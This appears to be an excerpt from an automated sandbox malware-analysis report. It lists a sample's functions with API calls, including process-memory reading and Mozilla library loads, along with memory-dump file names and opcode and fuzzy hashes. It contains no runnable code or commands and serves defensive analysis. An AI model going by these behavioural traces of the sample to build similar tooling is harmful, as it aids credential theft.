                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88A159B0A00605CFDB14CF29C984B9AFBF1BF89304F54866ED44AA7B00EB31A955CF94
                                                                                                                                                                                                                                                                                                                                  Function 6C6314A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C6314C5
                                                                                                                                                                                                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6314E2
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C631546
                                                                                                                                                                                                                                                                                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C6315BA
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C6316B4
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1909280232-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1a088863b516077379ffacf8829b664c9d39132139b73c5af2b7d88e679c5b67
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d3a8588ea1769b3b2b8d3cd5748750c0818ddec98c81ad5dc63db1717b30db71
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a088863b516077379ffacf8829b664c9d39132139b73c5af2b7d88e679c5b67
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD61F171A007109BDB11CF25C880BDEB7B1BF8A318F44A51CED8A57701DB35E949CB99
                                                                                                                                                                                                                                                                                                                                  Function 6C62DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C62DC60
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C62D38A,?), ref: 6C62DC6F
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,6C62D38A,?), ref: 6C62DCC1
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C62D38A,?), ref: 6C62DCE9
                                                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C62D38A,?), ref: 6C62DD05
                                                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C62D38A,?), ref: 6C62DD4A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1842996449-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d28f11006c0814a4f7722d1018142fd94d48efe222dbb3e5f9acd28aa3afaa18
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e16347947b816e5f670005d670e10611554a768339b2a8b7871f003463f447a3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d28f11006c0814a4f7722d1018142fd94d48efe222dbb3e5f9acd28aa3afaa18
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A417AB5A00605CFCB04CF99C880A9ABBF6FF89314B654569DA46ABB10D735FC01CF94
                                                                                                                                                                                                                                                                                                                                  Function 0041B68C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0041B69A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041B2BC: __mtinitlocknum.LIBCMT ref: 0041B2D2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041B2BC: __amsg_exit.LIBCMT ref: 0041B2DE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041B2BC: EnterCriticalSection.KERNEL32(?,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B2E6
                                                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(0042A260,00000020,0041B7DD,?,00000001,00000000,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E), ref: 0041B6D6
                                                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B6E7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041C136: EncodePointer.KERNEL32(00000000,0041C393,004D5FB8,00000314,00000000,?,?,?,?,?,0041BA07,004D5FB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041C138
                                                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(-00000004,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B70D
                                                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B720
                                                                                                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A220,0000000C,0041AF3A), ref: 0041B72A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2005412495-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b368105745a6ed8ee76dfd52bf20aaa228be3e659f0cb10f9770f58f7590507a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f2b3184d1a1304bb90a50cba908fab2f5b5379eafeb7e6c0534b29cc51b1fef6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b368105745a6ed8ee76dfd52bf20aaa228be3e659f0cb10f9770f58f7590507a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1331F974900349DFDF11AFA5D9856DDBAF1FF88314F14402BE460A62A0DB784985CF99
                                                                                                                                                                                                                                                                                                                                  Function 0041CD0E Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041CD1A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0041CD3A
                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0041CD4A
                                                                                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0041CD67
                                                                                                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0041CD7A
                                                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(0042C558), ref: 0041CD92
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 634100517-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 81166cf5a2c435bb4aac1af76a8190dca09a737386ef4d0c79be19083c51ecfa
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2018835A817219BC721AB6AACC57DE7B60BF04714F55412BE80467790C73CA9C1CBDD
                                                                                                                                                                                                                                                                                                                                  Function 004193F0 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 41stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(Pz,00000000,00000000,?,00409F71,00000000,007A0950,00000000), ref: 004193FC
                                                                                                                                                                                                                                                                                                                                  • lstrcpyn.KERNEL32(006D7580,Pz,Pz,?,00409F71,00000000,007A0950), ref: 00419420
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00409F71,00000000,007A0950), ref: 00419437
                                                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00419457
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: %s%s$Pz
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1206339513-3269018309
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 36a1aade9beab669742e698a5986ef2a8e6d9b7fa0e45cca69d8a80143706e49
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B011E75A18108FFCB04DFA8DD54EAE7B79EF48304F108249F9098B340EB31AA40DB96
                                                                                                                                                                                                                                                                                                                                  Function 00417180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0041719F
                                                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041741A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004171CD
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E61
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E85
                                                                                                                                                                                                                                                                                                                                  • VirtualQueryEx.KERNEL32(0041758D,00000000,?,0000001C), ref: 00417212
                                                                                                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041741A), ref: 00417333
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417060: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00417078
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: strlen$MemoryProcessQueryReadVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2950663791-2766056989
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d4c246fcbb90b677cbfa603dc812bd51b07a2c71a26f71c1c9cdc23e16c3c5e2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD5106B5E04109EBDB08CF98D981AEFB7B6BF88300F148159F915A7340D738AA41DBA5
                                                                                                                                                                                                                                                                                                                                  Function 00406A00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                                                  • String ID: zn@$zn@
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1029625771-1156428846
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 56bd16fc9bcf92c18956b4b249a59c76870f8c01999fa8d2962da2cd55bb9a52
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C571D874A04109DFDB04CF48C494BAAB7B1FF88305F158179E84AAF395C739AA91CF95
                                                                                                                                                                                                                                                                                                                                  Function 6C60F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C60F480
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5DF100: LoadLibraryW.KERNEL32(shell32,?,6C64D020), ref: 6C5DF122
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5DF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C5DF132
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6C60F555
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5E14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C5E1248,6C5E1248,?), ref: 6C5E14C9
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5E14B0: memcpy.VCRUNTIME140(?,6C5E1248,00000000,?,6C5E1248,?), ref: 6C5E14EF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5DEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C5DEEE3
                                                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32 ref: 6C60F4FD
                                                                                                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C60F523
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
